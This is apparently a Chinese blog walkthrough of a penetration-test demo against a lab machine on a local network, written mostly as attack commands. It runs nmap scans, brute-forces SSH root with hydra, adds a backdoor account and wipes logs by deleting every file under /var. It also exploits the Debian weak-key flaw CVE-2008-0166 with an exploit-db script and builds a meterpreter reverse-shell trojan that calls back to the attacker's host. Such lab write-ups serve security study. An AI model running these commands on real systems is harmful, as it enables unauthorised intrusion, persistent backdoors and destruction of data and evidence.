局域网攻击演示

（1）信息收集

1对局域网进行主机发现扫描：

nmap -sP 192.168.183.0/24

2确定攻击目标：本机ip地址为129，内网中还存在另一台主机，ip为134，这就是我们的目标，我们对它进一步扫描。

nmap -sV 192.168.183.134

通过分析，我们发现：目标主机开启大量可利用端口，ftp、ssh、telnet、smtp、mysql可以进行暴力破解，对方主机也开启了80端口，apache版本为2.2.8，php版本为5.2.4。

3放大招，使用nessus进行漏洞扫描。

4在web扫描这里，我发现一些严重漏洞，这一个可以直接登陆进去：

在这里，我们发现以下信息：

  网址：http://192.168.183.134:8180/manager/html

  用户名：tomcat

  密码：tomcat

  网址：http://192.168.183.134:8180/host-manager/html

  用户名：tomcat

  密码：tomcat

  网址：http://192.168.183.134:8180/manager/status

  用户名：tomcat

  密码：tomcat

好像发现了新大陆，我们继续寻找可用信息。

我们发现管理员路径为admin：

好像没太大用，由于时间比较紧，我们进行下一步。

（2）漏洞发现

通过分析上一步的扫描结果，分析得到以下信息：

找到漏洞编号：

CVE:  CVE-2009-3099, CVE-2009-3548, CVE-2010-0557, CVE-2010-4094

继续寻找之前nessus的扫描结果，找到以下内容：

找到漏洞编号：

找到漏洞编号，cve-2008-0166

（3）渗透测试攻击

1暴力破解

在扫描期间，我们先用hydra暴力破解试试，说不定运气好呢。

hydra -l root -P pass.txt –t 50 -e ns192.168.183.134 ssh

最开始使用上面命令，老是出现could not connect to target，查询了发现时因为线程开太多，被对方封了，所以改成1就可以正常运行。

hydra -l root -P pass.txt -t 1 -vV192.168.183.134 ssh

Success: 'root':'ubuntu' 还是root权限，接下来，直接用xshell连接就好了。

（5）创建账户

Useradd hack

Passwd hack

123

123

（6）清除日志文件

find   /var   -type   f  -exec   rm   -v   {}   \;

通过暴力破解，我们已经获得对方shell，这样好像有点简单。我想继续根据之前获取的信息进行攻击。

2漏洞攻击

Msfconsole搜索，发现并没有：

找到cve官网关于本漏洞的说明：

直接下载利用说明：

根据文档内容进行操作：

首先下载密钥文件：

上传到bt5并解压：

使用/pentest/exploits/exploitdb/searchsploit openssl搜索利用脚本文件：

我们随表找一个，我这里使用python脚本。

find / -name 5720.py

进入/pentest/exploits/exploitdb/platforms/linux/remote/，并执行破解：

python 5720.py /root/rsa/2048192.168.183.134 root

结果如下：

执行：

ssh -lroot -p22 -i/root/rsa/2048/57c3115d77c56390332dc5c49978627a-5429 192.168.183.134

成功获取对方shell。

（4）植入木马

生成木马：

msfpayload linux/x86/meterpreter/reverse_tcpLHOST=192.168.183.129 LPORT=55555 X > runme

将木马上传至目标主机：

在攻击机中开启服务端：

如果目标机不小心运行了木马文件，攻击机即可获得反弹shell。

 

阅读更多